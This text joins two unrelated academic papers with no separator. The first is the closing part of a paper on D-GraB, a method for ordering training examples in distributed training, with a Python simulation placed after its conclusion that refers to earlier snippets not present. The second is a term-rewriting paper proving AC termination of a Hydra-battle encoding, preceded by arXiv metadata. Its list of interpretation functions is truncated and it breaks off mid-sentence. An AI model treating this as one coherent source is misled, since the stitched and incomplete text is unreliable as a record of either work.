**Evaluation.** The convergence plots can be found in Figure 3: while Centralized Balance serves as the performance upper bound in most cases, both Centralized Balance and Centralized PairBalance outperform Centralized Random Reshuffling significantly. Notice that "Full Train Loss" means the full training objective achieved by \(w_{T}\) after \(T\) epochs, or formally \(\frac{1}{N}\sum_{i=1}^{N}f(w_{T};i)\). We observe that Centralized Balance shows a slightly better convergence rate than Centralized PairBalance for the following two reasons. (1) Since we only use a small learning rate, Centralized Balance is not significantly impacted by the issue of the stale mean. (2) Centralized Balance balances the examples at the finest granularity, while PairBalance can only achieve a granularity of 2, as it balances pairs of examples. However, both Centralized Balance and Centralized PairBalance have an \(\tilde{O}(1)\) herding objective, and Figure 3 demonstrates a minimal performance gap. Figure 3: Convergence Plots of Logistic Regression w. BERT Embeddings on GLUE (QQP), and LeNet on CIFAR-10. We run each task with 3 random seeds, and plot the average statistics as the line and the standard deviation across different seeds as the shaded area. ### Decentralized Data In this setting, we have \(n\) workers with identical initial weights, and we partition the entire dataset evenly into \(n\) folds 2. At the start of each epoch, each worker computes its new data permutation. On each optimization step, each worker gathers the gradients from all other workers and takes their average as the minibatch-averaged gradient for updating its local weights. Footnote 2: We discard the remainder after partitioning the dataset. **Baseline Example Ordering Algorithms** * **Distributed Random Reshuffling (D-RR)** Each worker gets a random permutation of its local dataset per epoch, as in Huang et al. [2021]. * **Independent Balance (I-B)** Each worker runs Balance independently. * **Independent PairBalance (I-PB)** Each worker runs PairBalance independently. **Evaluation.** We conduct experiments for both convex and non-convex cases: for the convex experiments, we consider Logistic Regression with BERT Embeddings on the QQP and QNLI tasks; for the non-convex experiments, we consider LeNet on CIFAR-10 and LSTM on WikiText-2. The convergence plots can be found in Figure 4. Throughout all experiments, the performance gap between D-GraB and D-RR can be significant, as we observe in Figure 4(c). In general, D-GraB achieves the best results with the lowest standard deviation among all baseline example ordering algorithms. Figure 4: Convergence Plots of Logistic Regression w. BERT Embeddings on GLUE (QNLI & QQP), LeNet on CIFAR-10, and LSTM on WikiText-2. We run 3 random seeds for each task, and we plot the average statistics as the line and the standard deviation across different seeds as the shaded area. **Training Time Analysis.** We compare the computation time of D-GraB and D-RR on the LeNet on CIFAR-10 task. We utilize a single machine with 4 Nvidia GeForce RTX 2080 Ti GPUs to host 4 workers (one worker per GPU), with NVIDIA NCCL as the communication backend. The results are shown in Figure 5: D-GraB's full train loss decreases faster in wall-clock time, and the PairBalance step only consumes 10% of an epoch's length on average, as shown in the right subfigure 3. Theoretically, the training time of D-GraB only differs from that of D-RR in the sorter step.
Currently, our sorter step for D-GraB uses a blocking call for simplicity; if we parallelize the sorter step (Sorter) with the optimization step (SGD) on each worker, we can further improve the time efficiency of D-GraB, since the two do not depend on each other. Please refer to Appendix A.5 for more details. Footnote 3: "Commun." stands for the communication of gradients. **Scalability.** To study how the convergence rate of D-GraB compares with the other ordering algorithms at different numbers of workers, we ablate the number of workers for the LeNet on CIFAR-10 task and plot the convergence of full train loss & test accuracy from 4 to 64 workers, as shown in Figure 6. We observe that D-GraB is robust to different numbers of workers, and when we have more workers, the performance gaps between D-GraB and Independent Balance (I-B) and Independent PairBalance (I-PB) become larger. Therefore, D-GraB is well suited to data parallelism compared with the other sorters. ## 6 Conclusion In this paper, we propose D-GraB, an algorithm that finds provably better data permutations than random ones in a distributed setting. We prove in theory that D-GraB enjoys a linear speedup and converges faster than random reshuffling. We substantiate our theory and the effectiveness of D-GraB on multiple machine learning applications including GLUE, CIFAR-10 and WikiText-2. Figure 5: The Analysis of Training Time of D-GraB & D-RR for the LeNet on CIFAR-10 Task. The time is averaged across 3 runs and across 4 workers. The left subfigure records the full train loss over wall-clock time, and the right subfigure compares each component's length averaged per epoch along with their standard deviations, with the time distribution of each component for D-GraB labeled on top.
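As a closing illustration of how the pieces fit together, here is a minimal single-process simulation of a D-GraB-style epoch: every step applies the averaged update of Equation (7) across workers, while the paired gradient differences collected during the epoch drive a PairBalance-style reordering of every worker's permutation for the next epoch. It is a sketch under the same hedges as the earlier snippets (greedy sign rule, positives-first reordering, hypothetical names), not the authors' Algorithm 2 or their parameter-server implementation.

```python
import numpy as np

def example_grad(w, a, b):
    """Gradient of f^i(w; j) = 0.5 * (a @ w - b)^2 for one local example."""
    return (a @ w - b) * a

def pair_balance_orders(diffs, orders):
    """Assign opposite signs within each pair of consecutive examples per worker
    (using the paired gradient differences) and reorder every permutation."""
    n = len(orders)
    running = np.zeros_like(diffs[0][0])
    signs = [np.zeros(len(o), dtype=int) for o in orders]
    for k in range(len(orders[0]) // 2):
        for i in range(n):
            y = diffs[i][k]
            s = 1 if np.linalg.norm(running + y, np.inf) <= np.linalg.norm(running - y, np.inf) else -1
            running = running + s * y
            signs[i][2 * k], signs[i][2 * k + 1] = s, -s
    new_orders = []
    for i in range(n):
        pos = [p for p, s in zip(orders[i], signs[i]) if s > 0]
        neg = [p for p, s in zip(orders[i], signs[i]) if s < 0]
        new_orders.append(pos + neg[::-1])
    return new_orders

if __name__ == "__main__":
    rng = np.random.default_rng(3)
    n, m, d, lr = 4, 128, 10, 0.05            # workers, examples per worker, dimension, step size
    A = rng.normal(size=(n, m, d))
    b = np.einsum("imd,d->im", A, rng.normal(size=d))
    w = np.zeros(d)
    orders = [list(range(m)) for _ in range(n)]
    for epoch in range(5):
        diffs = [[] for _ in range(n)]
        prev = [None] * n
        for j in range(m):                    # Equation (7): one averaged update per step
            grads = [example_grad(w, A[i, orders[i][j]], b[i, orders[i][j]]) for i in range(n)]
            for i in range(n):                # collect paired differences for the next ordering
                if j % 2 == 0:
                    prev[i] = grads[i]
                else:
                    diffs[i].append(prev[i] - grads[i])
            w = w - lr * np.mean(grads, axis=0)
        orders = pair_balance_orders(diffs, orders)
        loss = 0.5 * np.mean((np.einsum("imd,d->im", A, w) - b) ** 2)
        print(f"epoch {epoch}: full train loss {loss:.4f}")
```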
2307.14036
Hydra Battles and AC Termination
We present a new encoding of the Battle of Hercules and Hydra as a rewrite system with AC symbols. Unlike earlier term rewriting encodings, it faithfully models any strategy of Hercules to beat Hydra. To prove the termination of our encoding, we employ type introduction in connection with many-sorted semantic labeling for AC rewriting and AC-MPO, a new AC compatible reduction order that can be seen as a much weakened version of AC-RPO.
Nao Hirokawa, Aart Middeldorp
2023-07-26T08:40:21Z
http://arxiv.org/abs/2307.14036v2
# Hydra Battles and AC Termination, Revisited ###### Abstract We present a termination proof for the Battle of Hercules and Hydra represented as a rewrite system with AC symbols. Our proof employs type introduction in connection with many-sorted semantic labeling for AC rewriting and AC-RPO. JSPS KAKENHI Grant Numbers 22K11900.
C and rules 4 and 5. The end of the copying phase is signaled with E, which travels upwards with rules 6 and 7. Finally, rule 14 creates the next stage of the Battle. Note that we make extensive use of AC matching to simplify the search process. If \(H\) and \(H^{\prime}\) are the encodings in \(\mathcal{T}(\{\mathsf{h},\mathsf{i},\left|\right.\})\) of successive Hydras in an arbitrary battle then \(\mathsf{A}(n,H)\rightarrow^{+}_{\mathcal{H}/\mathsf{AC}}\mathsf{A}(\mathsf{s}(n),H^{\prime})\) for some \(n\in\mathcal{T}(\{\mathsf{0},\mathsf{s}\})\). Let \(H,H^{\prime}\in\mathcal{T}(\{\mathsf{h},\mathsf{i},\left|\right.\})\) be encodings of Hydras and let \(n\in\mathcal{T}(\{\mathsf{0},\mathsf{s}\})\) be the encoding of a natural number. If \(\mathsf{A}(n,H)\rightarrow^{*}_{\mathcal{H}/\mathsf{AC}}\mathsf{A}(\mathsf{s}(n),H^{\prime})\) then \(H\) and \(H^{\prime}\) are successive Hydras in a battle. The remaining part of this note is devoted to proving the termination of \(\mathcal{H}/\mathsf{AC}\). We exploit the fact that the TRS \(\mathcal{H}\) can be seen as a TRS over the many-sorted signature \[\mathsf{h}:\mathsf{O}\qquad\mathsf{i},\mathsf{E}:\mathsf{O}\rightarrow\mathsf{O}\qquad\mathsf{|}:\mathsf{O}\times\mathsf{O}\rightarrow\mathsf{O}\qquad\mathsf{A},\mathsf{B}:\mathsf{N}\times\mathsf{O}\rightarrow\mathsf{S}\] \[\mathsf{0}:\mathsf{N}\qquad\mathsf{s}:\mathsf{N}\rightarrow\mathsf{N}\qquad\mathsf{C},\mathsf{D}:\mathsf{N}\times\mathsf{O}\rightarrow\mathsf{O}\] where \(\mathsf{N}\), \(\mathsf{O}\) and \(\mathsf{S}\) are sort symbols. The type introduction technique [3, Corollary 3.9] guarantees that AC termination of \(\mathcal{H}\) follows from AC termination on well-sorted terms. A non-collapsing TRS over a many-sorted signature is AC terminating if and only if the corresponding TRS over the unsorted version of the signature is AC terminating. ## 2 Many-Sorted Semantic Labeling modulo AC The mutual dependence between the function symbols \(\mathsf{A}\) and \(\mathsf{B}\) in rules 3 and 14 of \(\mathcal{H}\) makes proving termination of \(\mathcal{H}/\mathsf{AC}\) a non-trivial task. We use the technique of semantic labeling (Zantema [9]) to resolve the dependence by labeling both \(\mathsf{A}\) and \(\mathsf{B}\) with the ordinal value of the Hydra encoded in their second arguments. Semantic labeling for rewriting modulo has been investigated in [5]. We need, however, a version for many-sorted rewriting, since the distinction between ordinals and natural numbers is essential for the effectiveness of semantic labeling for \(\mathcal{H}/\mathsf{AC}\). Before introducing semantic labeling, we recall some basic semantic definitions.
An _algebra_\(\mathcal{A}\) for an \(\mathcal{S}\)-sorted signature \(\mathcal{F}\) is a pair \((\{S_{\mathcal{A}}\}_{S\in\mathcal{S}},\{f_{\mathcal{A}}\}_{f\in\mathcal{F}})\), where each \(S_{\mathcal{A}}\) is a non-empty set, called the _carrier of sort_\(S\), and each \(f_{\mathcal{A}}\) is a function of type \(f:(S_{1})_{\mathcal{A}}\times\cdots\times(S_{n})_{\mathcal{A}}\to S_{ \mathcal{A}}\), called the _interpretation function_ of \(f:S_{1}\times\cdots\times S_{n}\to S\). A mapping that associates each variable of sort \(S\) to an element in \(S_{\mathcal{A}}\) is called an _assignment_. We write \(\mathcal{A}^{\mathcal{V}}\) for the set of all assignments. Given an assignment \(\alpha\in\mathcal{A}^{\mathcal{V}}\), the _interpretation_ of a term \(t\) is inductively defined as follows: \([\alpha]_{\mathcal{A}}(t)=\alpha(t)\) if \(t\) is a variable, and \([\alpha]_{\mathcal{A}}(t)=f_{\mathcal{A}}([\alpha]_{\mathcal{A}}(t_{1}), \ldots,[\alpha]_{\mathcal{A}}(t_{n}))\) if \(t=f(t_{1},\ldots,t_{n})\). Let \(\mathcal{A}=(\{S_{\mathcal{A}}\}_{S\in\mathcal{S}},\{f_{\mathcal{A}}\}_{f\in \mathcal{F}})\) be an \(\mathcal{S}\)-sorted \(\mathcal{F}\)-algebra. We assume that each carrier set \(S_{\mathcal{A}}\) is equipped with a well-founded order \(>_{S}\) such that the interpretation functions are weakly monotone in all argument positions, and call \((\mathcal{A},\{>_{S}\}_{S\in\mathcal{S}})\) a weakly monotone many-sorted algebra. Given terms \(s\) and \(t\) of sort \(S\), we write \(s\geqslant_{\mathcal{A}}t\)\((s=_{\mathcal{A}}t)\) if \([\alpha]_{\mathcal{A}}(s)\geqslant_{S}[\alpha]_{\mathcal{A}}(t)\)\(([\alpha]_{\mathcal{A}}(s)=_{S}[\alpha]_{\mathcal{A}}(t))\) holds for all \(\alpha\in\mathcal{A}^{\mathcal{V}}\). A labeling \(L\) for \(\mathcal{F}\) consists of sets of labels \(L_{f}\subseteq S_{\mathcal{A}}\) for every \(f:S_{1}\times\cdots\times S_{n}\to S\). The labeled signature \(\mathcal{F}_{\mathsf{lab}}\) consists of function symbols \(f_{a}:S_{1}\times\cdots\times S_{n}\to S\) for every function symbol \(f:S_{1}\times\cdots\times S_{n}\to S\) in \(\mathcal{F}\) and label \(a\in L_{f}\) together with all function symbols \(f\in\mathcal{F}\) such that \(L_{f}=\varnothing\). A _labeling_\((L,\mathsf{lab})\) for \((\mathcal{A},\{>_{S}\}_{S\in\mathcal{S}})\) consists of a labeling \(L\) for the signature \(\mathcal{F}\) together with a mapping \(\mathsf{lab}_{f}\colon(S_{1})_{A}\times\cdots\times(S_{n})_{A}\to L_{f}\) for every function symbol \(f:S_{1}\times\cdots\times S_{n}\to S\) in \(\mathcal{F}\) with \(L_{f}\neq\varnothing\). We call \((L,\mathsf{lab})\)_weakly monotone_ if all its labeling functions \(\mathsf{lab}_{f}\) are weakly monotone in all coordinates. The mapping determines the label of the root symbol \(f\) of a term \(f(t_{1},\ldots,t_{n})\), based on the values of its arguments \(t_{1},\ldots,t_{n}\). Formally, for every assignment \(\alpha\in\mathcal{A}^{\mathcal{V}}\) we define a mapping \(\mathsf{lab}_{\alpha}\) inductively as follows: \[\mathsf{lab}_{\alpha}(t)=\begin{cases}t&\text{if $t\in\mathcal{V}$}\\ f(\mathsf{lab}_{\alpha}(t_{1}),\ldots,\mathsf{lab}_{\alpha}(t_{n}))&\text{if $t=f(t_{1}, \ldots,t_{n})$ and $L_{f}=\varnothing$}\\ f_{\alpha}(\mathsf{lab}_{\alpha}(t_{1}),\ldots,\mathsf{lab}_{\alpha}(t_{n}))& \text{if $t=f(t_{1},\ldots,t_{n})$ and $L_{f}\neq\varnothing$}\end{cases}\] where \(a\) denotes the label \(\mathsf{lab}_{f}([\alpha]_{\mathcal{A}}(t_{1}),\ldots,[\alpha]_{\mathcal{A}}( t_{n}))\). 
Note that \(\mathsf{lab}_{\alpha}(t)\) and \(t\) have the same sort. Given a TRS \(\mathcal{R}\) over a (many-sorted) signature \(\mathcal{F}\), we define the _labeled_ TRS \(\mathcal{R}_{\mathsf{lab}}\) over the signature \(\mathcal{F}_{\mathsf{lab}}\) as follows: \[\mathcal{R}_{\mathsf{lab}}=\{\mathsf{lab}_{\alpha}(\ell)\to\mathsf{lab}_{ \alpha}(r)\mid\ell\to r\in\mathcal{R}\text{ and }\alpha\in A^{V}\}\] Since the AC symbol \(|\) in the encoding of the Hydra battle is a constructor, there is no need to label it. Hence we assume for simplicity that \(L_{f}=\varnothing\) for every AC symbol \(f\in\mathcal{F}\). The TRS \(\mathcal{D}\mathsf{ec}\) consists of all rewrite rules \[f_{a}(x_{1},\ldots,x_{n})\to f_{b}(x_{1},\ldots,x_{n})\] with \(f:S_{1}\times\cdots\times S_{n}\to S\) a function symbol in \(\mathcal{F}\), \(a,b\in L_{f}\) such that \(a>_{S}b\), and pairwise different variables \(x_{1},\ldots,x_{n}\). A weakly monotone algebra \((\mathcal{A},>)\) is a _quasi-model_ of \(\mathcal{R}/\mathsf{AC}\) if \(\ell\geqslant_{\mathcal{A}}r\) for all rewrite rules \(\ell\to r\) in \(\mathcal{R}\) and \(\ell=_{\mathcal{A}}r\) for all equations \(\ell\approx r\) in \(\mathsf{AC}\). Let \(\mathcal{R}/\mathsf{AC}\) be a TRS over a many-sorted signature \(\mathcal{F}\), \((\mathcal{A},\{>_{S}\}_{S\in\mathcal{S}})\) a quasi-model of \(\mathcal{R}/\mathsf{AC}\) with a weakly monotone labeling \((L,\mathsf{lab})\). If \((\mathcal{R}_{\mathsf{lab}}\cup\mathcal{D}\mathsf{ec})/\mathsf{AC}\) is terminating then \(\mathcal{R}/\mathsf{AC}\) is terminating. After these preliminaries, we are ready to put many-sorted semantic labeling to the test. Consider the many-sorted algebra \(\mathcal{A}\) with carriers \(\mathbb{N}\) for sort \(\mathsf{N}\) and \(\mathbb{O}\), the set of ordinal numbers smaller than \(\epsilon_{0}\), for sorts \(\mathsf{O}\) and \(\mathsf{S}\) and the following interpretation functions: \[\mathsf{0}_{\mathcal{A}}=1\] \[\mathsf{h}_{\mathcal{A}}=1\] Here \(\oplus\) denotes natural addition on ordinals, which is strictly monotone in both arguments. The algebra \((\mathcal{A},\{>_{\mathsf{O}},>_{\mathsf{N}}\})\) is a quasi-model of \(\mathcal{H}/\mathsf{AC}\). We now label \(\mathsf{A}\) and \(\mathsf{B}\) by the value of their second argument. 
Let \(L_{\mathsf{A}}=L_{\mathsf{B}}=\mathbb{O}\) and \(L_{f}=\varnothing\) for the other function symbols \(f\), and define \(\mathsf{lab}\) as follows: \[\mathsf{lab}_{\mathsf{A}}(n,x)=\mathsf{lab}_{\mathsf{B}}(n,x)=x\] The labeling \((L,\mathsf{lab})\) results in the infinite rewrite system \(\mathcal{H}_{\mathsf{lab}}\cup\mathcal{D}\mathsf{ec}\) with \(\mathcal{H}_{\mathsf{lab}}\) consisting of the rewrite rules \[\begin{aligned} \mathsf{A}_{\omega}(n,\mathsf{i}(\mathsf{h}))&\ \stackrel{{1}}{{\longrightarrow}}\ \mathsf{A}_{1}(\mathsf{s}(n),\mathsf{h})&\mathsf{D}(n,\mathsf{i}(\mathsf{i}(x)))&\ \stackrel{{8}}{{\longrightarrow}}\ \mathsf{i}(\mathsf{D}(n,\mathsf{i}(x)))\\ \mathsf{A}_{\omega^{v+1}}(n,\mathsf{i}(\mathsf{h}\mid x))&\ \stackrel{{2}}{{\longrightarrow}}\ \mathsf{A}_{\omega^{v}}(\mathsf{s}(n),\mathsf{i}(x))&\mathsf{D}(n,\mathsf{i}(\mathsf{i}(x)\mid y))&\ \stackrel{{9}}{{\longrightarrow}}\ \mathsf{i}(\mathsf{D}(n,\mathsf{i}(x))\mid y)\\ \mathsf{A}_{\omega^{v}}(n,\mathsf{i}(x))&\ \stackrel{{3}}{{\longrightarrow}}\ \mathsf{B}_{\omega^{v}}(n,\mathsf{D}(\mathsf{s}(n),\mathsf{i}(x)))&\mathsf{D}(n,\mathsf{i}(\mathsf{i}(\mathsf{h}\mid x)\mid y))&\ \stackrel{{10}}{{\longrightarrow}}\ \mathsf{i}(\mathsf{C}(n,\mathsf{i}(x))\mid y)\\ \mathsf{C}(\mathsf{0},x)&\ \stackrel{{4}}{{\longrightarrow}}\ \mathsf{E}(x)&\mathsf{D}(n,\mathsf{i}(\mathsf{i}(\mathsf{h}\mid x)))&\ \stackrel{{11}}{{\longrightarrow}}\ \mathsf{i}(\mathsf{C}(n,\mathsf{i}(x)))\\ \mathsf{C}(\mathsf{s}(n),x)&\ \stackrel{{5}}{{\longrightarrow}}\ x\mid\mathsf{C}(n,x)&\mathsf{D}(n,\mathsf{i}(\mathsf{i}(\mathsf{h})\mid y))&\ \stackrel{{12}}{{\longrightarrow}}\ \mathsf{i}(\mathsf{C}(n,\mathsf{h})\mid y)\\ \mathsf{i}(\mathsf{E}(x)\mid y)&\ \stackrel{{6}}{{\longrightarrow}}\ \mathsf{E}(\mathsf{i}(x\mid y))&\mathsf{D}(n,\mathsf{i}(\mathsf{i}(\mathsf{h})))&\ \stackrel{{13}}{{\longrightarrow}}\ \mathsf{i}(\mathsf{C}(n,\mathsf{h}))\\ \mathsf{i}(\mathsf{E}(x))&\ \stackrel{{7}}{{\longrightarrow}}\ \mathsf{E}(\mathsf{i}(x))&\mathsf{B}_{v+1}(n,\mathsf{E}(x))&\ \stackrel{{14}}{{\longrightarrow}}\ \mathsf{A}_{v}(\mathsf{s}(n),x) \end{aligned}\] for all \(v\in\mathbb{O}\), and \(\mathcal{D}\mathsf{ec}\) consisting of the rewrite rules \[\mathsf{A}_{v}(n,x)\,\to\,\mathsf{A}_{w}(n,x)\qquad\mathsf{B}_{v}(n,x)\,\to\,\mathsf{B}_{w}(n,x)\] for all \(v,w\in\mathbb{O}\) with \(v>w\). According to Theorem 3.1, the AC termination of \(\mathcal{H}\) on many-sorted terms follows from the AC termination of \(\mathcal{H}_{\mathsf{lab}}\cup\mathcal{D}\mathsf{ec}\). If \(\mathcal{H}_{\mathsf{lab}}\cup\mathcal{D}\mathsf{ec}\) is AC terminating then \(\mathcal{H}\) is AC terminating on sorted terms. ## 3 AC-MPO In order to show AC termination of \(\mathcal{H}_{\mathsf{lab}}\cup\mathcal{D}\mathsf{ec}\) we use a simplified version of AC-RPO. Let \(\mathcal{F}_{\mathsf{AC}}\) be the set of AC symbols in \(\mathcal{F}\). Given a non-variable term \(t=f(t_{1},\ldots,t_{n})\), the multiset \(\triangledown(t)\) of its arguments is defined inductively as follows: \[\triangledown(t)=\triangledown_{f}(t_{1})\uplus\dots\uplus\triangledown_{f}(t_{n})\] \[\triangledown_{f}(t)=\begin{cases}\triangledown_{f}(t_{1})\uplus\triangledown_{f}(t_{2})&\text{if $t=f(t_{1},t_{2})$ and $f\in\mathcal{F}_{\mathsf{AC}}$}\\ \{t\}&\text{otherwise}\end{cases}\] For example, if \(+\) is an AC symbol, we have \(\triangledown_{+}(\mathsf{a}+(\mathsf{b}+x))=\{\mathsf{a},\mathsf{b},x\}\).
If \(f\) is a non-AC symbol, we have \(\triangledown(f(t_{1},\ldots,t_{n}))=\{t_{1},\ldots,t_{n}\}\). Let \(>\) be a precedence. We define \(>_{\mathsf{acmpo}}\) inductively as follows: \(s>_{\mathsf{acmpo}}t\) if \(s\notin\mathcal{V}\) and one of the following conditions holds: 1. \(\triangledown(s)\geqslant_{\mathsf{acmpo}}^{\mathsf{mul}}\{t\}\), 2. \(\mathsf{root}(s)>\mathsf{root}(t)\) and \(\{s\}>_{\mathsf{acmpo}}^{\mathsf{mul}}\triangledown(t)\), 3. \(\mathsf{root}(s)=\mathsf{root}(t)\) and \(\triangledown(s)>_{\mathsf{acmpo}}^{\mathsf{mul}}\triangledown(t)\). Here \(\geqslant_{\mathsf{acmpo}}\) is the union of \(>_{\mathsf{acmpo}}\) and \(=_{\mathsf{AC}}\). Moreover, \(=_{\mathsf{AC}}\) is used instead of \(=\) in the definition of multiset extension. Note that if there are no AC symbols, the above definition reduces to the original recursive path order of Dershowitz [1], nowadays known as the _multiset path order_. Hence the simplified AC-RPO will be called AC-MPO. We assume that AC symbols are minimal in a given precedence. Without the assumption, the relation \(>_{\mathsf{acmpo}}\) is not closed under contexts. To see this, consider the example of [6, Section 3]: Let \(>\) be the precedence with \(+>\mathsf{c}\), where \(+\) is an AC symbol. The relation \(\mathsf{a}+\mathsf{a}>_{\mathsf{acmpo}}\mathsf{c}\) holds, but \(\mathsf{a}+(\mathsf{a}+\mathsf{a})>_{\mathsf{acmpo}}\mathsf{a}+\mathsf{c}\) does not. Note that due to the minimality requirement, different AC symbols are incomparable. In fact, if the AC symbols \(\times\) and \(+\) satisfy \(\times>+\) then \(x\times y>_{\mathsf{acmpo}}x+y\) but not \(z\times(x\times y)>_{\mathsf{acmpo}}z\times(x+y)\). If \(\mathrm{AC}\) symbols are minimal in the precedence \(>\) then \(>_{\mathsf{acmpo}}\) is an incremental \(\mathrm{AC}\)-compatible rewrite order with the subterm property. As a consequence, \(>_{\mathsf{acmpo}}\) is an AC-compatible reduction order when the underlying signature is finite. This also holds for infinite signatures, provided the precedence \(>\) is well-founded and there are only finitely many AC symbols. This extension is important because the signature of \(\mathcal{H}_{\mathsf{lab}}\) is infinite. Below, we will formally prove the correctness of the extension, by adopting the approach of [4]. A strict order \(>\) on a set \(A\) is a _partial well-order_ if for every infinite sequence \(a_{0},a_{1},\ldots\) of elements in \(A\) there exist indices \(i\) and \(j\) such that \(i<j\) and \(a_{i}\leqslant a_{j}\). Well-founded total orders (_well-orders_) are partial well-orders. Given a partial well-order \(>\) on \(\mathcal{F}\), the _embedding_ TRS \(\mathcal{E}\mathsf{mb}(\mathcal{F},>)\) consists of the rules \(f(x_{1},\ldots,x_{n})\to x_{i}\) for every \(n\)-ary function symbol and \(1\leqslant i\leqslant n\), together with the rules \(f(x_{1},\ldots,x_{n})\to g(x_{i_{1}},\ldots,x_{i_{m}})\) for all function symbols \(f\) and \(g\) with arities \(m\) and \(n\) such that \(f>g\), and indices \(1\leqslant i_{1}<i_{2}<\cdots<i_{m}\leqslant n\). Here \(x_{1},\ldots,x_{n}\) are pairwise distinct variables. [[4, Theorem 5.3]] A rewrite order \(>\) is well-founded if \(\mathcal{E}\mathsf{mb}(\mathcal{F},\sqsupset)\subseteq>\) for some partial well-order \(\sqsupset\). Consider a signature \(\mathcal{F}\) with only finitely many \(\mathrm{AC}\) symbols that are minimal in a given well-founded precedence \(>\). The relation \(>_{\mathsf{acmpo}}\) is an \(\mathrm{AC}\)-compatible reduction order. 
Proof.: We only need to show well-foundedness of \(>_{\mathsf{acmpo}}\) because the other properties follow by Theorem 3.2. Let \(\sqsupset\) be an arbitrary partial well-order that contains \(>\) and in which \(\mathrm{AC}\) symbols are minimal. The inclusion \(\mathcal{E}\mathsf{mb}(\mathcal{F},\sqsupset)\subseteq\sqsupset_{\mathsf{acmpo}}\) is easily verified. Hence the well-foundedness of \(\sqsupset_{\mathsf{acmpo}}\) is obtained from Theorem 3.2. Since \(>\subseteq\sqsupset\), the incrementality of \(\mathrm{AC}\)-MPO yields \(>_{\mathsf{acmpo}}\subseteq\sqsupset_{\mathsf{acmpo}}\). It follows that \(>_{\mathsf{acmpo}}\) is well-founded. We show the termination of \(\mathcal{H}_{\mathsf{lab}}\cup\mathcal{D}\mathsf{ec}\) by \(\mathrm{AC}\)-MPO. To this end, we consider the following precedence \(>\) on the labeled signature: \[\mathsf{A}_{v} >\mathsf{A}_{w} \text{for all }v,w\in\mathbb{O}\text{ with }v>w\] \[\mathsf{B}_{v} >\mathsf{B}_{w} \text{for all }v,w\in\mathbb{O}\text{ with }v>w\] \[\mathsf{B}_{v+1} >\mathsf{A}_{v} >\mathsf{B}_{v} \text{for all }v\in\mathbb{O}\] \[\mathsf{B}_{0} >\mathsf{s}>\mathsf{D}>\mathsf{C}>\mathsf{i}>\mathsf{E}>|\] Note that \(>\) is well-founded and the only \(\mathrm{AC}\) symbol \(|\) is minimal. In order to ease the compatibility verification we employ the following simple criterion. Let \(\ell\to r\) be a rewrite rule and let \(>\) be a precedence. If \(\mathsf{root}(\ell)>g\) for all function symbols \(g\) in \(r\) then \(\ell>_{\mathsf{acmpo}}r\). \(\mathcal{H}_{\mathsf{lab}}\cup\mathcal{D}\mathsf{ec}\,\subseteq\,>_{\mathsf{acmpo}}\) Proof.: Lemma 3.2 applies to all rules of \(\mathcal{H}_{\mathsf{lab}}\cup\mathcal{D}\mathsf{ec}\), except \(5\,-\,9\). We consider rule \(6\) here; the other rewrite rules are handled in a similar fashion. Since case (1) of Definition 9 yields \(\mathsf{E}(x)>_{\mathsf{acmpo}}x\), we have \(\triangledown(\mathsf{E}(x)\,|\,y)=\{\mathsf{E}(x),y\}>_{\mathsf{acmpo}}^{\text{mul}}\{x,y\}=\triangledown(x\,|\,y)\). Thus \(\mathsf{E}(x)\,|\,y>_{\mathsf{acmpo}}x\,|\,y\) follows by case (3). Using case (3) again, we obtain \(\mathsf{i}(\mathsf{E}(x)\,|\,y)>_{\mathsf{acmpo}}\mathsf{i}(x\,|\,y)\). Because of \(\mathsf{i}>\mathsf{E}\), the desired orientation \(\mathsf{i}(\mathsf{E}(x)\,|\,y)>_{\mathsf{acmpo}}\mathsf{E}(\mathsf{i}(x\,|\,y))\) is concluded by case (2). The TRS \(\mathcal{H}_{\mathsf{lab}}\cup\mathcal{D}\mathsf{ec}\) is \(\mathrm{AC}\) terminating. Hence, the TRS \(\mathcal{H}/\mathsf{AC}\) is terminating. ## 4 Concluding Remarks We presented a termination proof of the recent encoding of the Battle of Hydra and Hercules as a TRS with \(\mathrm{AC}\) symbols. Compared to [2], the new ingredient in this paper is a much weakened version of \(\mathrm{AC}\)-RPO. This might ease future formalization efforts. In the previous edition of WST we presented a termination proof of the TRS \(\mathcal{H}\) using a new \(\mathrm{AC}\) termination criterion based on weakly monotone algebras, which we recall here. 
**Theorem 16**.: _A TRS\(\mathcal{R}\) over a finite many-sorted signature \(\mathcal{F}\) is \(\mathrm{AC}\) terminating if there exists a totally ordered simple monotone \(\mathcal{F}\)-algebra \((\mathcal{A},>)\) such that \(\mathcal{R}\subseteq>_{\mathcal{A}}\), \(\mathsf{AC}\subseteq=_{\mathcal{A}}\), and \(f_{\mathcal{A}}\) is strictly monotone for all \(\mathrm{AC}\) symbols \(f\)._ Here an \(\mathcal{S}\)-sorted \(\mathcal{F}\)-algebra \(\mathcal{A}=(\{S_{\mathcal{A}}\}_{S\in\mathcal{S}},\{f_{\mathcal{A}}\}_{f\in \mathcal{F}})\) equipped with a strict order \(>\) on the union of all carriers \(S_{\mathcal{A}}\) is _simple monotone_ if every carrier \(S_{\mathcal{A}}\) is non-empty, \((S_{i})_{\mathcal{A}}\subseteq S_{\mathcal{A}}\) for all \(f:S_{1}\times\cdots\times S_{n}\to S\) in \(\mathcal{F}\) and \(1\leqslant i\leqslant n\), and every interpretation function \(f_{\mathcal{A}}\) is weakly monotone and simple. The latter amounts to the requirement \(f_{\mathcal{A}}(a_{1},\ldots,a_{i},\ldots,a_{n})\geqslant a_{i}\) for all \(1\leqslant i\leqslant n\) and \((a_{1},\ldots,a_{n})\in(S_{1})_{\mathcal{A}}\times\cdots\times(S_{n})_{ \mathcal{A}}\). When applying Theorem 16 to the _many-sorted_ TRS\(\mathcal{H}\) we used the following interpretation for the symbol \(\mathsf{D}\): \[\mathsf{D}_{\mathcal{A}}((n_{1},n_{2},n_{3}),(x_{1},x_{2},x_{3}))=(n_{1}+x_{1},n_{2}+x_{2},n_{2}+n_{3}+x_{2}+x_{3})\] with \((n_{1},n_{2},n_{3})\in(\mathbb{N}\setminus\{0,1\})\times\mathbb{N}\times \mathbb{N}\) and \((x_{1},x_{2},x_{3})\in(\mathbb{O}\setminus\{0,1\})\times\mathbb{N}\times \mathbb{N}\). This is however not weakly monotone as \((1,0,0)>(0,0,1)\) but \[\mathsf{D}_{\mathcal{A}}((1,0,0),(\omega,0,0))=(\omega,0,0) \mathsf{D}_{\mathcal{A}}((0,0,1),(\omega,0,0))=(\omega,0,1)\] with \((\omega,0,0)<(\omega,0,1)\). Hence the termination proof in last year's WST paper is wrong. The problem is that the lexicographic product of weakly monotone orders is in general not weakly monotone ([8, Example 26]). Note that the second and third components were introduced to orient rules \(6\,\mbox{--}\,9\). In the new proof \(\mathrm{AC}\)-MPO orients the rules by taking the precedence 